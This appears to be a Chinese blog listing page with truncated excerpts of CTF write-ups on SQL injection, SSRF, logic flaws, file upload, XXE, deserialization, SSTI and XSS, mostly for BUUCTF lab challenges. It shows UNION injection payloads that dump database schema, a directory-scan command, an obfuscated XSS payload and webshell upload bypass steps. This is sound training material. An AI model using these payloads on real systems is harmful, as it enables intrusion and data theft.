24kmagic

快速入门web-sql注入及buuctf西电题解08 第八章 天衍真言，星图显圣 题解1.判断字段数order by 2 2.判断回显位 ‘union select 1,2# Welcome 1 3.数据库名 ‘union select database()# Welcome user 4.尝试查询数据库名为user下的所有表名 ‘union select group_concat(table_name),2 from information_schema.tables where table_schema=’user’# Welcome flag,users 5.尝试查询 数据库名为user，表名为flag 下的所有列名 ‘union select group_concat(column_name),2 from information_schema.columns where table_schema=’user’ and table_name=’flag’# Welcome value 6.查找数据 错误答案：’union select va...

快速入门web-ssrf及buuctf西电题解SSRF = 服务器端请求伪造特点 主体是服务器：请求是「服务器发起」的，不是你的电脑； 权限是服务器的权限：服务器能访问的资源（本地文件、内网 IP），你本来访问不到，但通过 SSRF 就能间接访问； 核心是 “伪造请求”：你伪造一个服务器会执行的请求（比如本地文件地址、内网地址），服务器替你执行。 [网鼎杯 2018]Fakebook11.注册登陆界面，sqlmap扫描 1python dirsearch.py -u "http://3992b9c4-b99e-44db-96b6-111d3cb92681.node5.buuoj.cn:81/" -e php --threads 1 --delay 3 -w ./ctf_core.txt 打开备份文件 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phpclass UserInfo{ public $na...

快速入门web-逻辑漏洞及buuctf西电题解[极客大挑战 2019]BuyFlag1题目：我一开始是想去把xff改成学校的特定内网ip，发现根本没有用，因为你不知道ip是啥啊 123456789101112FlagFlag need your 100000000 moneyattentionIf you want to buy the FLAG:You must be a student from CUIT!!!You must be answer the correct password!!!Only Cuit's students can buy the FLAG 由题，没思路，看源码 1234567891011<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "pas...

快速入门web-信息泄露收集及buuctf西电题解buuctf 禁止套娃1.找不到flag，没有思路，dir扫描 git泄露 2.githack工具获取源码 3.代码分析 123456789101112131415161718192021222324252627<?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { //preg_replace(正则, NULL, $_GET['exp']) ->把输入中正则部分给删掉 if(';' === preg_replace('/[a...

快速入门web-文件上传+包含及buuctf西电题解知识点： 1.include 是什么include "/flag";include 原本的设计目的是为了让你把写好的 PHP 代码（比如头部导航栏）拼接到当前页面里。 但是，如果你让它去 include 一个不是 PHP 代码的文件（比如 /flag），它会发生一个非常有趣的现象： 它发现这玩意儿不是代码：PHP 引擎打开 /flag，一看开头没有 <?php。 它直接原样输出：PHP 觉得“既然这不是代码，那我就把它当成普通的 HTML 文字，直接显示在网页上吧”。 结果： 你的 Flag 就这样被“顺便”打印在了屏幕上。 [第二章 web进阶]文件上传 1 文件上传漏洞 题解1.上传webshell.jpg文件 2.发现上传成功却无法打开 是因为上传的目录是随机的，所以用御剑扫描即可，找到对应网页 打开 [ACTF2020 新生赛]Upload 1十分波折的一道题目哈 1.文件上传php，失败，显示只能jpg等一堆正常格式 2.上传木马jpg，改成php，nonono 3.那改成phtml？黑名单绕...

快速入门xml在ctf中的运用及知识点 DOCTYPE（文档类型定义的声明） ENTITY（实体的声明） SYSTEM、PUBLIC（外部资源申请） 123456内部实体<!ENTITY 实体名称 "实体值">外部实体<!ENTITY 实体名称 SYSTEM "URL"> 10 第十章 天机符阵_revenge随便输入，得到： 12345<br /><b>Warning</b>: DOMDocument::loadXML(): Start tag expected, '&lt;' not found in Entity, line: 1 in <b>/var/www/html/chapter10.php</b> on line <b>17</b><br /><阵枢>引魂玉</阵枢><解析>未定义</解析><输出>...

快速入门字符串逃逸——序列化和反序列化（未完待续）大家经常会在代码审议的时候看到unserialize() 或许有些人会跟我一样没有仔细深入的了解它，只是会运用它而已。 那么为了我们以后的学习和记忆我们还是得要认识一下这个老客户的。 第一篇unserialize()1.读取规则——php是怎么读取它的内容的？例子：把php想象成扫描仪 a:1:{s:4:"name";s:3:"cat";} 看到 a:1：扫描仪进入“数组模式”，它心里记下：“我要找 1 对键值对”。 看到 {：开始读数组内部。 看到 s:4：进入“字符串读取模式”。重点来了： 看到数字 4 后，它会找引号 "。 从引号后的第一个字符开始，它往后数 4 个字节。 数完 4 个后：它睁开眼，必须看到一个收尾的引号 "。如果没看到，直接报错；如果看到了，这个字符串读取成功。 看到 ;：表示这个字段结束，准备读下一个。 衍生知识点1.那我们这里就可以涉及一个知识点——反序列化逃逸1s:N....... 若遇到 字符串替换 ，那么我们的php会怎么...

快速入门ssti模板注入及ctf题解模板注入初步¶ ProbiusOfficial/Hello-CTF 前置知识¶在开始之前，我们先大概介绍一下什么是模板，什么又是模板注入。 什么是模板¶模板 是一种用于生成动态内容的工具。 它们通常包含两个基本部分： 比如下图为 Hello-CTFtime 项目中，渲染比赛列表的时候用到的模板： 绿色 部分为 静态内容 ，而 橙色 部分则是 动态占位符 大多数模板的工作流程： 定义模板 -> 传递数据 -> 渲染模板 -> 输出生成 什么是模板注入¶我们之前在说SQL注入的时候，这样描述SQL注入 “通过可控输入点达到非预期执行数据库语句”，比如后台预期的语句是： 1SELECT username,password FROM users WHERE id = "数据传递点" 在预期情况下，数据传递点只会是 1，2，3，4…… 但是我们要是让数据传入点的值为 1" union select 1,group_concat(schema_name) from inform...

xxs知识点简短速记分类： 1.反射型（外部输入后，在浏览器端输出触发） 2.存储型（东西存在文件中，web程序读取代码并输出） 知识点1：html实体编码： HTML 实体编码 的规则是： &# + 十进制 ASCII 码 + ; 字母 r 的十进制 ASCII 码是 114。 所以它的 HTML 实体编码就是 r。 CSRF：到底是什么？ 黑客没偷你的证件（他拿不到 Cookie）。 黑客只是骗你点了一下按钮（利用了你还在登录状态的权限）。 结果： 在你完全不知情的情况下，你的身份被黑客**“借用”**了。 举例： <img= src=1 oner&#114;or=ale&#114;t(1)> 知识点2：Referer 是看你从哪来。 Token 是看你带没带暗号。 Sec-Fetch Sec: 是 Security（安全）的缩写。 Fetch: 翻译为 “获取” 或 “抓取”（在编程里指代发起一个网络请求）。 合起来的意思： “安全获取元数据”（Security Fetch Metadata）。 它是浏览器在发起请求时，自动给服...

NewStar CTF 2025 Week1 - misc EZ_fence题目： “ RAR 发现一张残缺的照片竟然需 要 4 颗钉子才能钉住，照片里面似乎藏着秘密。 ” 1.说照片里面有秘密不如先看看照片里面能找到什么 ->找到了flag还有rar压缩包 于是选择binwalk查看和分离(参数-e) 不知道为什么foremost分离不出来 这里面需要密码 这时候联想到栅栏fence密码和四个栏数（四个钉子），但是我们去哪里找到这个密码呢？ 2.查看属性发现高度被修改了 打开steglove改一些数据 找到宽和长修改 理解： 1.FF C0 ->JPEG 的 Start of Frame 标记 2.00 11 ->该段内容的长度 3.08 ->精确度 就得到了图片里面的内容： 12348426513709qazwsxedcrfvtgbyhnu jmikop1QWSAERFDTYHGUIKJOPLMNBVCXZ -_rdh9zfwzSgoVA7GWtLPQJK=vwuZvjhvPyyvjnMWoSotB 2.1先用四个栏数看看解密，发现w...